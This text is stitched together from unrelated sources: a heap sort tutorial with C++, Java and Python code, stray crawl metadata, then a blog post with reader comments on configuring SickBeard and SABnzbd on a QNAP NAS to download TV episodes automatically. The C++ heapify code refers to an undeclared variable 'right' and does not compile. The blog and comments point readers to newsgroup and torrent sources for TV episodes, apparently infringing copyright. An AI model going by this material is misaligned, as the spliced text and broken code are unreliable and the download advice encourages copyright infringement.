shows two scenarios - one in which the root is the largest element and we don’t need to do anything. And another in which root had larger element as a child and we needed to swap to maintain max-heap property. If you’re worked with recursive algorithms before, you’ve probably identified that this must be the base case. Now let’s think of another scenario in which there are more than one levels. The top element isn’t a max-heap but all the sub-trees are max-heaps. To maintain the max-heap property for the entire tree, we will have to keep pushing 2 downwards until it reaches its correct position. Thus, to maintain the max-heap property in a tree where both sub-trees are max-heaps, we need to run heapify on the root element repeatedly until it is larger than its children or it becomes a leaf node. We can combine both these conditions in one heapify function as void heapify(int arr[], int n, int i) { int largest = i; int l = 2*i + 1; int r = 2*i + 2; if (l < n && arr[l] > arr[largest]) largest = l; if (right < n && arr[r] > arr[largest]) largest = r; if (largest != i) { swap(arr[i], arr[largest]); // Recursively heapify the affected sub-tree heapify(arr, n, largest); } } This function works for both the base case and for a tree of any size. We can thus move the root element to the correct position to maintain the max-heap status for any tree size as long as the sub-trees are max-heaps. Build max-heap To build a max-heap from any tree, we can thus start heapifying each sub-tree from the bottom up and end up with a max-heap after the function is applied on all the elements including the root element. In the case of complete tree, the first index of non-leaf node is given by n/2 - 1. All other nodes after that are leaf-nodes and thus don’t need to be heapified. So, we can build a maximum heap as // Build heap (rearrange array) for (int i = n / 2 - 1; i >= 0; i--) heapify(arr, n, i); As show in the above diagram, we start by heapifying the lowest smallest trees and gradually move up until we reach the root element. If you’ve understood everything till here, congratulations, you are on your way to mastering the Heap sort. Procedures to follow for Heapsort - Since the tree satisfies Max-Heap property, then the largest item is stored at the root node. - Remove the root element and put at the end of the array (nth position) Put the last item of the tree (heap) at the vacant place. - Reduce the size of the heap by 1 and heapify the root element again so that we have highest element at root. - The process is repeated until all the items of the list is sorted. The code below shows the operation. for (int i=n-1; i>=0; i--) { // Move current root to end swap(arr[0], arr[i]); // call max heapify on the reduced heap heapify(arr, i, 0); } Performance Heap Sort has O(nlogn) time complexities for all the cases ( best case, average case and worst case). Let us understand the reason why. The height of a complete binary tree containing n elements is log(n) As we have seen earlier, to fully heapify an element whose subtrees are already max-heaps, we need to keep comparing the element with its left and right children and pushing it downwards until it reaches a point where both its children are smaller than it. In the worst case scenario, we will need to move an element from the root to the leaf node making a multiple of log(n) comparisons and swaps. During the build_max_heap stage, we do that for n/2 elements so the worst case complexity of the build_heap step is n/2*log(n) ~ nlogn. During the sorting step, we exchange the root element with the last element and heapify the root element. For each element, this again takes logn worst time because we might have to bring the element all the way from the root to the leaf. Since we repeat this n times, the heap_sort step is also nlogn. Also since the build_max_heap and heap_sort steps are executed one after another, the algorithmic complexity is not multiplied and it remains in the order of nlogn. Also it performs sorting in O(1) space complexity. Comparing with Quick Sort, it has better worst case ( O(nlogn) ). Quick Sort has complexity O(n^2) for worst case. But in other cases, Quick Sort is fast. Introsort is an alternative to heapsort that combines quicksort and heapsort to retain advantages of both: worst case speed of heapsort and average speed of quicksort. Application of Heap Sort Systems concerned with security and embedded system such as Linux Kernel uses Heap Sort because of the O(n log n) upper bound on Heapsort's running time and constant O(1) upper bound on its auxiliary storage. Although Heap Sort has O(n log n) time complexity even for worst case, it doesn’t have more applications ( compared to other sorting algorithms like Quick Sort, Merge Sort ). However, its underlying data structure, heap, can be efficiently used if we want to extract smallest (or largest) from the list of items without the overhead of keeping the remaining items in the sorted order. For e.g Priority Queues. Heap Sort Implementation in different Programming Languages C++ Implementation // C++ program for implementation of Heap Sort #include <iostream> using namespace std; void heapify(int arr[], int n, int i) { // Find largest among root, left child and right child int largest = i; int l = 2*i + 1; int r = 2*i + 2; if (l < n && arr[l] > arr[largest]) largest = l; if (right < n && arr[r] > arr[largest]) largest = r; // Swap and continue heapifying if root is not largest if (largest != i) { swap(arr[i], arr[largest]); heapify(arr, n, largest); } } // main function to do heap sort void heapSort(int arr[], int n) { // Build max heap for (int i = n / 2 - 1; i >= 0; i--) heapify(arr, n, i); // Heap sort for (int i=n-1; i>=0; i--) { swap(arr[0], arr[i]); // Heapify root element to get highest element at root again heapify(arr, i, 0); } } void printArray(int arr[], int n) { for (int i=0; i<n; ++i) cout << arr[i] << " "; cout << "\n"; } int main() { int arr[] = {1,12,9,5,6,10}; int n = sizeof(arr)/sizeof(arr[0]); heapSort(arr, n); cout << "Sorted array is \n"; printArray(arr, n); } Java program for implementation of Heap Sort // Java program for implementation of Heap Sort public class HeapSort { public void sort(int arr[]) { int n = arr.length; // Build max heap for (int i = n / 2 - 1; i >= 0; i--) { heapify(arr, n, i); } // Heap sort for (int i=n-1; i>=0; i--) { int temp = arr[0]; arr[0] = arr[i]; arr[i] = temp; // Heapify root element heapify(arr, i, 0); } } void heapify(int arr[], int n, int i) { // Find largest among root, left child and right child int largest = i; int l = 2*i + 1; int r = 2*i + 2; if (l < n && arr[l] > arr[largest]) largest = l; if (r < n && arr[r] > arr[largest]) largest = r; // Swap and continue heapifying if root is not largest if (largest != i) { int swap = arr[i]; arr[i] = arr[largest]; arr[largest] = swap; heapify(arr, n, largest); } } static void printArray(int arr[]) { int n = arr.length; for (int i=0; i < n; ++i) System.out.print(arr[i]+" "); System.out.println(); } public static void main(String args[]) { int arr[] = {1,12,9,5,6,10}; HeapSort hs = new HeapSort(); hs.sort(arr); System.out.println("Sorted array is"); printArray(arr); } } Python program for implementation of heap sort (Python 3) def heapify(arr, n, i): # Find largest among root and children largest = i l = 2 * i + 1 r = 2 * i + 2 if l < n and arr[i] < arr[l]: largest = l if r < n and arr[largest] < arr[r]: largest = r # If root is not largest, swap with largest and continue heapifying if largest != i: arr[i],arr[largest] = arr[largest],arr[i] heapify(arr, n, largest) def heapSort(arr): n = len(arr) # Build max heap for i in range(n, -1, -1): heapify(arr, n, i) for i in range(n-1, 0, -1): # swap arr[i], arr[0] = arr[0], arr[i] #heapify root element heapify(arr, i, 0) arr = [ 12, 11, 13, 5, 6, 7] heapSort(arr) n = len(arr) print ("Sorted array is") for i in range(n): print ("%d" %arr[i])
https://www.programiz.com/dsa/heap-sort
CC-MAIN-2020-16
refinedweb
2,165
62.72
Opened 7 years ago Closed 3 years ago #8639 closed defect (wontfix) PyGIT._get_branches fails with ValueError on commit messages with line feeds Description (last modified by ) I have a commit here that includes a subject line that includes ^M characters. This will cause get_branches to fail when trying to unpack the malformed lines resulting from splitting on linefeed boundary. Here is a proposed fast solution that will replace all ^M characters so that retrieving the branch information does not fail def _get_branches(self): "returns list of (local) branches, with active (= HEAD) one being the first item" result = [] for e in self.repo.branch("-v", "--no-abbrev").replace('\r', '/CTRL-R').splitlines(): bname, bsha = e[1:].strip().split()[:2] if e.startswith('*'): result.insert(0, (bname, bsha)) else: result.append((bname, bsha)) return result Attachments (0) Change History (2) comment:1 Changed 7 years ago by comment:2 Changed 3 years ago by Note: See TracTickets for help on using tickets. GitPlugin is deprecated. Please upgrade to Trac 1.0 and use TracGit.
https://trac-hacks.org/ticket/8639
CC-MAIN-2018-30
refinedweb
173
66.03
and start exposing and integrating APIs and services to your clients and other parts of your organization. At Solo.io we’ve open-sourced a microservices gateway built on top of Envoy Proxy named Gloo. Gloo is a platform agnostic control plane for Envoy purposefully built to understand “function” level calls (think combination of HTTP path/method/headers, gRPC calls, or Lambda functions) for the purposes of composing them and building richer APIs for both north-south AND east-west traffic. Gloo is also highly complementary to service-mesh technology like Istio. Gloo’s functionality includes: - Function routing (REST methods, gRPC endpoints, Lambda/Cloud Functions) - Fine grained traffic shifting (function canary, function weighted routing, etc) - Request/content transformations (implicit and explicit) - Authorization / Authentication - Rate limiting - gRPC - WebSockets - SOAP / WSDL - Deep metrics collection - GraphQL Engine for aggregate data APIs - powerful platform-agnostic discovery mechanisms Gloo has very deep Kubernetes-native support and can be run as a cluster-ingress for your Kubernetes cluster. As a side note, for some much-needed clarification on Ingress, API Gatweay, API Management (and even service mesh) take a look at the blog post “API Gateways are going through an identity crisis” In helping folks use Gloo in AWS EKS, we’ve had to navigate through the fairly complex choices of choosing and exposing services running in Kubernetes. These options will be the same for other Kuberentes-native ingress, API, or function gateways. Since AWS EKS is Kubernetes, we could expose a microservices/API gateway like Gloo in the following ways: - a Kubernetes Ingress Resource - a Kubernetes Service with type LoadBalancer - a Kubernetes Service as a NodePort (not recommended for production) On Gloo, we are also working on native OpenShift support and should have it shortly. In the meantime, if you’re running workloads on AWS EKS, you may have some questions about how to leverage a microservices gateway or whether you should just use the AWS managed AWS API Gateway? Let’s explore the options here. Using AWS API Gateway with your EKS cluster AWS EKS is really a managed control plane for Kubernetes and you run your worker nodes yourself. A typical setup is to have your worker nodes (EC2 Hosts) in a private VPC and using all of the built in VPC isolation, security groups, IAM policies, etc. Once you start deploying workloads/microservices to your Kubernetes cluster, you may wish to expose them and/or provide a nicely decoupled API to your clients/customers/partners, etc. Your first question is probably along the lines of “well, since I’m using AWS, it should just be super easy to use the AWS API Gateway in front of my Kubernetes cluster”. As you start to dig, you realize it’s not exactly that straight forward to connect AWS API Gateway to your EKS cluster. What you find is AWS API Gateway runs in it’s own VPC and is completely managed so you cannot see any details about its infrastructure. Luckily, with AWS API Gateway, you can do “Private Integrations” to connect to HTTP endpoints running in your own VPC. Private Integrations allow you to expose a Network Load Balancer (NLB) in your private VPC which can terminate traffic for your API Gateway to VPC integration. So basically the AWS API Gateway would create a VpcLink to a NLB running in your VPC. So that’s great! The Network Load Balancer is a very powerful load balancer but even if it runs inside your VPC it doesn’t know about or understand the workloads running in your Kubernetes cluster (ie, Kubernetes Pods). Let’s change this. At this point we need to deploy some kind of Kubernetes Ingress endpoint which understands how to route to Pods. Some folks might tend to favor using the native Kubernetes Ingress resource at this point, or you really could just use a single Kubernetes service exposed as a “LoadBalancer”. In fact, we can take this a step further. The default load balancer created when you specify LoadBalancer in a Kubernetes Service in EKS is a classic load balancer. The problem with this is the API Gateway cannot route to a classic load balancer. We need the Kubernetes service running inside EKS to create a network load balancer. For example, this configuration would create a classic load balancer: apiVersion: v1 kind: Service metadata: name: gloo namespace: default annotations: {} spec: ports: - name: http port: 80 protocol: TCP targetPort: 80 selector: app: gloo type: LoadBalancer Adding the annotation service.beta.kubernetes.io/aws-load-balancer-type: "nlb" will cause AWS to create a network load balancer when we create this service in EKS: apiVersion: v1 kind: Service metadata: name: gloo namespace: default labels: app: gloo annotations: service.beta.kubernetes.io/aws-load-balancer-type: "nlb" spec: externalTrafficPolicy: Local ports: - name: http port: 80 protocol: TCP targetPort: 80 selector: app: gloo type: LoadBalancer At this point, we have the correct combination of load balancer (NLB in private VPC) and AWS API Gateway configured correctly. We can even have AWS web application firewall (WAF) enabled on the AWS API Gateway. The only problem is, we have the power (and cost) of the AWS API Gateway at the edge, but it still doesn’t understand the workloads we have running within the Kubernetes cluster. When we want to do things like canary releases, API aggregation, function routing and content transformation, we need to do that within the Kubernetes cluster. Gloo solves for that. So do you really need API Gateway -> NLB -> API Gateway? In this case, you could just promote your network load balancer to a public subnet, let Gloo handle all of the API Gateway routing, traffic shaping, rate limiting, and not lose any of the functionality of the AWS API Gateway (Lambda routing, AuthZ/N, Websockets, etc). Alternative set ups We started the previous section with an assumption that an AWS API Gateway would be simpler to integrate with our Kubernetes cluster when using EKS than an alternative solution. We found that’s not the case. We do have other options, however. If you’re using EKS, you’ll need some sort of API gateway or microservices gateway that runs within Kubernetes. But how do we get traffic to our EKS cluster? And what if we want to take advantage of things like the AWS Web Application Firewall (WAF)? The options we have, given the various types of load balancers and tradeoffs of running a microservices/API Gateway in AWS EKS come down to the following: AWS API Gateway + private VPC NLB + simple Kubernetes Ingress This is similar to the previous section, but instead of using a powerful microservices gateway like Gloo, you opt to use a basic ingress controller in Kubernetes. In this case you leverage the AWS API Gateay, have nice things like the AWS Web Application Firewall, but you lose the fidelity of workloads running in EKS (pods) AWS API Gateway + private VPC NLB + powerful Kubernetes microservices gateway like Gloo This is the usecase from the previous section. Now you’ve gained the power of a microservices gateway closer to the workloads in EKS, but you’ve got a redundant and expensive gateway at your edge. The benefit here is you still can take advantage of AWS web application firewall (WAF). Public NLB + powerful Kubernetes microservices gateway like Gloo In this case, we’ve eschewed the AWS API Gateway and are just using a network load balancer sitting in a public subnet. All of the power of the microservices/API gateway now sits close to your workloads in EKS, but you lose the web application firewall (cannot be applied to NLB). If you have your own WAF you’re using, this may not be a bad tradeoff. Public ALB + private NLB + powerful Kubernetes microservices gateway like Gloo You can more finely control the public facing network requests with an Application Load Balancer (which you can apply AWS WAF) and still keep your EKS traffic private and controlled through a private NLB. With this approach you can also centrally manage all of your certificates for TLS through CloudFormation Public ALB managed as a Kubernetes Ingress Controller + Kubernetes API Gateway private to the Kuberentes cluster You can use the Kubernetes Ingress with Application Load Balancer 3rd-party plugin to manage your ALB in Kubernetes. At this point you can run your API Gateweay locally and privately within your EKS cluster and still take advantage of WAF because we’re using an ALB. The downside is this functionality is provided by a third-party plugin and you cannot centrally manage your certificates with cloud formation. That is, you have to use the Ingress annotations to manage those. Conclusion There are a handful of options to run your microservices/API Gateway in AWS EKS. Each combination comes with tradeoffs and should be carefully considered. We built Gloo specifically to be a powerful cross platform, cross-cloud microservices API Gateway. This means you have even more options when running on AWS, on premises, or any other cloud. Each organization will have their unique constraints, opinions, and options. We believe there are good options to make a monolith to microserivces or on-premises hybrid deployment to public cloud a success. If you have an alternative suggestion for this use case, please reach out to me @christianposta on twitter or in the comments of this blog.
https://www.javacodegeeks.com/2019/02/exposing-running-microservices.html
CC-MAIN-2019-09
refinedweb
1,560
55.37
Accessing date and time It may sometimes be useful to access the current date and/or time. As an example, when writing code it may be useful to access the time at particular stages to monitor how long different parts of code are taking. To access date and time we will use the datetime module (which is held in a package that is also, a little confusingly called datetime!): from datetime import datetime To access the current date and time we can use the now method: print (datetime.now()) OUT: 2018-03-28 08:54:13.623198 You might not have expected to get the time to the nearest microsecond! But that may be useful at times when timing short bits of code (which may have to run many times). But we can access the date and time in different ways: current_datetime = datetime.now() print ('Date:', current_datetime.date()) # note the () after date print ('Year:', current_datetime.year) print ('Month:', current_datetime.month) print ('Day:', current_datetime.day) print ('Time:', current_datetime.time()) # note the () after time print ('Hour:', current_datetime.hour) print ('Minute:', current_datetime.minute) print ('Second:', current_datetime.second) OUT: Date: 2018-03-28 Year: 2018 Month: 3 Day: 28 Time: 08:54:13.636654 Hour: 8 Minute: 54 Second: 13 Having microseconds in the time may look a little clumsy. So let’s format the date and using the strftime method. now = datetime.now() print (now.strftime('%Y-%m-%d')) print (now.strftime('%H:%M:%S')) OUT: 2018-03-28 08:54:13 Timing code We can use datetime to record the time before and after some code to calculate the time taken, but it is a little simpler to use the time module which keeps all time in seconds (from January 1st 1970) and gives even more accuracy to the time: import time time_start = time.time() for i in range(100000): x = i ** 2 time_end = time.time() time_taken = time_end - time_start print ('Time taken:', time_taken) OUT: Time taken: 0.03149104118347168 One thought on “19. Accessing date and time, and timing code”
https://pythonhealthcare.org/2018/03/28/19-accessing-date-and-time-and-timing-code/
CC-MAIN-2020-29
refinedweb
337
68.26
Super Charge your XBMC(KODI)/HTPC Setup with fully automated download of TV Episodes … QNAP (I use the QNAP TS-869 Pro ) has some very flexible NAS devices, with expandable functionality by means of so called QPKG install packages. But QPKG’s are not only created by QNAP, quite a few volunteers seeking specific new functions for their beloved QNAP NAS create QPKG’s as well. One of these functions is adding Sick Beard and SABnzbd which adds the option to automatically retrieve TV Series episodes that become available in Newsgroups. It does not only retrieve the files, but it also finds new episodes, relevant meta data, etc … There are 58 comments. You can read them below. You can post your own comments by using the form below, or reply to existing comments by using the "Reply" button. Fantastic article, had everything up and running after a hour or so, the only issue I have atm is with the post processing, the files seem to remain in the SABnzbd Complete directory, They are not moved to Qnap … /Multimedia/TVSeries any suggestions ? Dazcon5 Thanks Dazcon5! Seems our post processing script is not running for some reason; Check in SABnzbd: Folders -> User Folders -> Post-Processing Scripts Folder (mine says: /share/MD0_DATA/.qpkg/SickBeard/autoProcessTV) Check in SABnzbd: Categories -> your category -> sabToSickBeard.py (where your category is your TV Series category) You can find the category also in SickBeard: Config -> Search Settings -> NZB Search -> SABnzbd Category, and should match your category. Check /share/MD0_DATA/.qpkg/SickBeard/autoProcessTV/autoProcessTV.cfg, it should have something like this: Let me know if verifying these settings helped. hans Great article. I had Sickbeard/Sabnzdb set up previously on a windows home server, though bit the bullet and put this on my qnap 869. Everything works great, though I have one glitch: the post-processing script appears to be timing out in SABnzbdb and not completing successfully, ie I see: running script: sabToSickbeard.py then after a long (10 minutes or so) I see the error: “Exit(1) socket error: [Errno 104] Connection reset by peer (More)”, clicking on the error details I get: Opening URL: Traceback (most recent call last): File “/share/MD0_DATA/.qpkg/SickBeard/autoProcessTV/sabToSickBeard.py”, line 29, in <module> autoProcessTV.processEpisode(sys.argv[1], sys.argv[2]) File “/share/MD0_DATA/.qpkg/SickBeard/autoProcessTV/autoProcessTV.py”, line 101, in processEpisode result = urlObj.readlines() File “/share/MD0_DATA/.qpkg/Python/lib/python2.7/socket.py”, line 513, in readlines line = self.readline() File “/share/MD0_DATA/.qpkg/Python/lib/python2.7/socket.py”, line 428, in readline data = recv(1) socket.error: [Errno 104] Connection reset by peer Note: I have the metadata enabled and am using custom directories. The show is being parsed and moved to the tvseries directory fine (incl. renamed), though the metadata is not there. Disabling the fetch of all the metadata in sickbeard did not help. I’ve gone through all the steps again rigourously, though still same issue. Any ideas, or how to debug the python script live? ;-) Thanks Zed I’ve not seen that problem before … After some searching, a few things that might be the cause of this: Check you autoprocesstv.cfg details like passwords etc … but I’m confident that you already did all this. Disable the use of SSL has been suggested elsewhere – but that didn’t make sense to me considering your situation. But it does remind me of some issues I encountered when I used SSL to access the QNAP admin pages. Is your Sickbeard or SabNZBd (on your QNAP) accessed through https? What happen when you enter http://<qnap-ip>:9091? Or do you use https://<qnap-ip>:9091? hans I’ve solved it! Debugging the .py script there was an ssl variable which determined whether the link used was http or https… this pointed me back to the autoProcessTV.cfg file. Adding the line “ssl=1” (without quotes) got things going – after restarting both Sickbeard and SABnzbdb – and all works nicely now! :) Disabling SSL on SB would have worked, though I access remotely, so wanted SSL ;-). Thanks again for the informative guide here. Cheers! Zed Awesome Zed! Glad to hear that, and thanks for posting the solution here! hans Thanks, you guys are good, @hans I think I jumped in to quick when I posted last time, the following afternoon I checked again for the tips you gave me but when I looked at the directories everything was up and working ! dazcon5 No problem Dazcon5! You’re most welcome … hans Fantastic Info, I had a windows machine doing this until now. I have followed the instructions but I am getting the following output from the script. Traceback (most recent call last): File “/share/CACHEDEV1_DATA/.qpkg/SickBeard/autoProcessTV/sabToSickBeard.py”, line 23, in <module> import autoProcessTV File “/share/CACHEDEV1_DATA/.qpkg/SickBeard/autoProcessTV/autoProcessTV.py”, line 23, in <module> import ConfigParserImportError: No module named ConfigParser I cant for the life of me figure out where I have went wrong, any ideas ? Kind Regards Brian Boston I just checked, and it could be that you are not running Phyton 2.7, and instead be using a newer Phyton version – in newer versions ConfigParser is no longer capitalized (so it’s spelled: configparser). In my SickBeard file ConfigParser is spelled the same as in your. If you type from an SSH shell just “phyton” followed by pressing ENTER, the version number should display (CTRL+D to exit). Since Sickbeard assumes Phyton 2.5 – 2.7, make sure your setup is not running 3.x …. I also assume you’ve installed OptWare before installing SickBeard. If not: remove SickBeard, install OptWare and re-install SickBeard. Through OptWare you can install Phyton 2.7 if needed. The link should be something like this: In this list Phyton 2.7 should appear – if it wasn’t installed – and you can simply click “install” there. Since I haven’t ran into this issue, this would be my first guess … hans Hi Hans, Thanks for your help, after running the command it tells me I have Python 2.7.3. I also installed the latest OptWare and Python before installing sick beard. Brian Boston Seems you have the right Phyton version (I’m running Python 2.7). Probably not relevant but your .qpkg path is definitly different than mine. You have: On my 869 it is: And I do not have the CACHEDEV1_DATA …. the name makes me wonder … Another common mistake seems to be (after Googling it again): Did you create a “autoprocessTV.cfg” file? (ie. rename the .SAMPLE file) hans Hi, yes i have edited the .cfg file with the correct port and other info. I am on version 4.1 firmware which on my model changes the storage manager to a newer version and some of the directory structure, I am starting to think this is something to do with it. I have had chance to check the same cofig / settings out on a ts-559 even though it is on the same 4.1 firmware it maintains the older storage manager and directory structure and it works fine. brian boston I’m running the latest stable version (4.0.3 on a TS869) and that does not seem to change the storage manager. …. You could be right that this might cause this, but I have no means to verify that Thanks for the heads up though: I won’t be upgrading to 4.1 until others have determined it to not causing issues … hans I am also having this problem. Did you find a solution? I am running QNAP TS-269L with 4.1 firmware. I installed OptWare and Python before Sickbeard and I have confirmed I am using 2.7.3-1 Neal Hi Neal, I have no means to mimics the setup (running 4.0.3, and not very eager to see the directory structure change), maybe Brian can let us know if he managed to find a solution or not? hans Yeah I was hoping Brian will respond with anything that he has found. It is interesting to have this error. I had to rebuild my QNAP NAS as I mucked up the share permissions with Windows ACL so I had to start again. So I rebuilt it from factory defaults. I was already running the latest 4.1 software and it was working fine. The only difference is that I moved from a Mirrored RAID-1 to (non-mirrored) RAID-0 (as I have now have an external USB drive using rsync for important files to keep another backup). Apart from that no other changes in system configuration. I tried a couple of attempts to fix the issue as I believe it has something to do with Python version (or maybe access to the Python libraries [could be a Path issue as previously using Mirrored RAID-1 my path was share/MD0_DATA and now it is share/CACHEDEV1_DATA). I uninstalled all apps and OptWare and Python. I then tried to manually installed them and I had a strange issue that SickBeard required v2.6 of Phython as wasn’t liking just v2.7. So I uninstalled them used the QNAP facility to install the OptWare, Phython etc. I had to use OptWare to install 2.6 of Phython and checked to ensure that 3.0 of Phython was not installed. Once this was done, everything was working again….but unfortunately the same issue is still there where is says : import ConfigParserImportError: No module named ConfigParser All scripts are ‘standard’ and nothing altered except for autoProcessTV.cfg to set my username/password. I have done lots of Google searches with no luck. As Brian has recently done this I can see he had the issue, as do I, which is a result of a recent re-build. However as I said previously it all worked. My only idea is that it has to do with the change in path and Sickbeard scripts failing to locate Python libraries…. Next step for me is to try and find any hardcoding of path for MD0_DATA potentially in Sickbeard?? Or should I look at SABNZdb as this is calling these scripts? Neal Since I’m not running into this issue, helping can be a challenge, so I’ll just throw a few ideas out there – some of them probably already checked by either of you … 1) in “/etc/config/qpkg.conf” I found (note the Shell and Install paths) – specially the Install_Path seems to be called often in sickbeard.sh: 2) In “sickbeard.sh” (in the Sickbeard qpkg dir) – check the DAEMON parameters, seems to be very specific about Python 2.7 (although the code states that 2.5, 2.6 or 2.7 will work): It baffles me that you two appear the only ones in this universe that run into this problem – which seems unlikely to me. Anything I found related to this error message basically says: Wrong Python version or Reinstall Sickbeard (the latter being a bit of a lame answer). I’m not sure how many people run QTS 4.1 … hans I have the exact same issue here. Poking around i noticed that sabnzbd.sh is using python2.6 (i am using 130927 by Clinton Hall), there are comments about updating it to python2.7. I have tried both nzbToMedia.py and sabToSickbeard.py with exactly the same issue, ConfigParser not found. I can manually run sabToSickbeard.py without issue however. Leads me to believe this is some kind of pathing/environment issue with how sabnzbd is launched. I am also running 4.1beta on a TS-870pro (intel proc). I will muck around with sabnzbd.sh to see if i can get it to find the correct path within the sabnzbd context and let you know …. darkkith @darkkith; Maybe we should compare some environment variable with QTS < 4.1? Seems this problem ONLY happens with QTS 4.1. hans @hans you are probably correct that this problems seems to occur only with 4.1. I am not really sure where to start on comparing environment variables. When i manually run the script it functions, however when sabnzbd launches the script it exits prematurely. The error i see in sabnzbd is: autoProcessTV.py starts with this: I was able to find “urllib.py” and “os.path.py” in the same location “ConfigParser.py” exists (/opt/lib/python2.6, it’s also in /opt/lib/python2.7 but i dont think its really relevant) darkkith Darkkith, when you look at Brian’s info (/share/CACHEDEV1_DATA/.qpkg/), does your .qpkg path start with the same? (versus mine: /share/MD0_DATA/.qpkg/) Different results when executed from command-line versus from browser can (IMO) cause differences in environment variables. I wish I knew enough about Python to make a dump of this to a file so we can compare. hans Hi Hans. As mentioned I am a Linux newbie, but from what I could work out (without much success) was the path of python in the script was the main issue. I attempted editing but had a few issues. Basically I gave up in frustration, downgraded my QNAP to 4.05 and everything worked as normal with no headaches…..so basically there must be an issue with the 4.1 firmware for QNAP. Sorry I cannot be more useful than that….. I hope this helps the other guys with 4.1 on here. Thanks again for your support, your site is great…..one of my bookmarks for sure….now onto reading about the Rasberry Pi …. Neal Don’t feel bad …. I would have done the same-thing as well. hans well i wasnt able to solve the problem as yet. One suggestion from the qnap forums was to install the python qpkg but i had the same errors after doing so. as mentioned in the thread i ended up adding a cronjob to run sabToSickBeard.py regularly and so far that seems to be working. i guess there may be a small race condition when files are being copied into the completed folder but i think i can live with that for now darkkith I assume when QTS 4.1 becomes mainstream that this “issue” will either be fixed by QNAP (maybe they did something wrong in the beta), or plenty of users will jump on it to get the QPKG fixed … Too bad it didn’t work right out of the box though … It’s also unfortunate that I can’t test on my QNAP – I’d hate to screw things up. I have asked in the QNAP forums before if it would be possible to ru QTS in a virtual machine (after all, it’s x86 Linux) for testing purposes, but of course the answer remains “No!” even from QNAP. This would have been the exact reason to have a virtual machine for testing before screwing up a working setup. Reading your post at the QNAP Forum, the user clinton.hall suggests missing packages … maybe we could try copying the python directories from say QTS 4.0.5 to a QTS 4.1 setup or at least compare the files? hans Thanks for the tips here. Experienced same on 669 pro using 4.1.1 firmware. Ended up rolling back to 4.0.5 and working fine again. Shaun Thanks Shaun for posting your findings! It’s much appreciated! hans mine is the same as yours Things can get a little confusing here but i found a couple other things… my sabnzbd appears to be running python2.6. It failed to start when i tried to make it use python2.7 complaining about pyopenSSL. I didnt want to open that can of worms unnecessarily so i reverted to python2.6… i guess the optware package installed both for me… convenient. I believe the sabToSickbeard.py script is executing with python2.7, but i cannot really be certain yet. I am guessing this is the case because of the first line in the script: this resolves to the python2.7 bin. This is also how i was running the script manually… since then i have confirmed that running this script with python2.6 is also fine. i also have posted to the qnap forums, if i get a response there that is relevant i’ll try to link it back here. darkkith Thanks Darkkith – good find with the python versions and the path differences (at least we know it’s not the path). …. Mine actually has 2.5, 2.6, and 2.7 installed If you find anything: please post it here … others will benefit from it (and maybe even myself if I switch to QTS 4.1 ) … hans So I’ve followed your tutorial to a T and I’m running into an initial issue. I have no problem accessing Sabnzbd and running through the wizard, but when it goes to restart, I cannot access Sabnzbd anymore. Any idea why that might be? Dustin I’m assuming that the admin page is not loading? If that the case: – Make sure you entered the right port number (I use for my own setup a non-standard port number – maybe you did this as well) – Try disabling, wait a little bit, and re-enabling of SABNzbd in the QNAP admin pages As the QPKG get’s updated frequently, you could consider getting the latest version from the QNAP Forum: Download SabNZBD here (it is supposed to automatically download the latest version). hans I did download the latest after the first attempt yielded the same results. I have double checked the ports and also double checked the port forwarding on my router as a precaution. I’m at a loss…. Dustin 1) If you’re familiar with SSH and how to get into the QNAP, see if SABnzbd is running: This should return something like this: I’ve ran into issue in the past that actually (re)starting can take some time when there are a lot of items in the Queue. (probably not the case: but make sure it’s running with python 2.6 or 2.7 – SabNzbd does not appear to work python 3.x) 2) Make sure you use http:// (or https:// if you set that explicitly). Note: I think the default port is 7071, in mysetup I uses 8800, feel free to try either (I realize this sounds mundane). 3) I’m assuming you did the disable, enable trick already. Can you tell me what is happening? Your browser refuses to load the SABNzbd admin page? Also: port forwarding is only relevant if you want to access SABnzbd from outside (ie. not from home). hans Ok I figured out the problem with not having access, I was choosing the option of only being able to access sabnzbd from “this” computer rather than any computer. Anyways, that is solved. Next problem…when I choose categories, I don’t have the option to choose sabToSickBeard.py , the only option I get is None. What other folder would the script be located in? Dustin Did you check out the message (2de one in this list of comments – Jul 25 to Dazcon5)? hans I use SickBeard index Womble and autonzb.co newznab server but do i need more then 3? because i have some problems downloading old episodes. Maria Hi Maria, Quite a few only keep up with the most recent episodes. You might want to add at least one more – unfortunately, good ones are not always free. A good example is NZBPlanet.net – which is very cheap and a good NZB source. Even when adding more than just one, much older episodes or less popular series might be problematic in general and to those series complete you might have to resort to some manual searching at sites like for example NZB.cc (for NZB’s) or KickAssTorrents (for torrents), to get the series complete. hans Attempting to install SABnzbdplus I get this error SABnzbdplus 140815 installation failed. The following Optware package must be installed: python26, py26-openssl, py26-cheetah, unrar, par2cmdline, unzip. “>SABnzbdplus 140815 installation failed. The following Optware package must be installed: python26, py26-openssl, py26-cheetah, unrar, par2cmdline, unzip. I’m on a TS-412 Hesh I think the TS-412 might be a non-Intel NAS (Marvel I think)? The error is basically saying, as far as I can see, that you need to install OptWare (a QPKG freely available through the admin pages of your QNAP). hans I got OptWare and Py (2.7) installed. When i try to install SABNzbd i get an error that says i need Py 2.6 and few other components. I skipped that as I only want SB running. Hesh Unfortunately, I cannot reproduce this error, since I’ve already got it running. It’s seems that the Python version check is not taking into account that 2.7 is suitable as well. Did SB install? And if so: did you try to run it? Or is it just crapping out and not installing? hans Nop. SB tells me it cant get to I was trying it over remote though, over mycloud service. I’ll have a crack when i go home. Hesh Nop. SB tells me it cant get to I was trying it over remote though, over mycloud service. I’ll have a crack when i go home. Hesh Guys, back to basics here. So I have Sickrage running on my QNAP, and it is “snatched” the files I want from Torrents site, but is there any other application I can use to download the torrents? Does the in built Download Manager dl these torrents, or is SABNZBD the only option? I am not using newsgroup, only torrents, so confused if SABNZBD is required also to download the shows? TIA Matt If I recall correctly, QNAP Download Manager does handle Bittorrents … I found this link confirming that. hans I have everything going right until the download completes and then I get this error. Exit(1) Can’t import autoProcessTV.py, make sure it’s in the same folder as /share/CACHEDEV1_DATA/.qpkg/SickBeard-TPB/autoProcessTV/sabToSickBeard.py Any ideas? I’ve made sure the post-processing scripts folder is correct. /share/CACHEDEV1_DATA/.qpkg/SickBeard-TPB/autoProcessTV Hence it’s not processing in Sickbeard… Jeremy In Sickbeard under Post-Processing I have left TV download Dir blank Process episode method as Move Extra Scripts blank Move Associated files checked Rename Episodes checked Scan and Process checked unpack unchecked use failed downloads unchecked. Jeremy Hi Jeremy, sorry to hear you’re running into an issue … first thing I’d check is if the config file is setup right and if the autoProcessTV.py file is correct. You might want to look at the comments in this part of the comment section, specially this part. Hope this info helps … hans Hey guys, 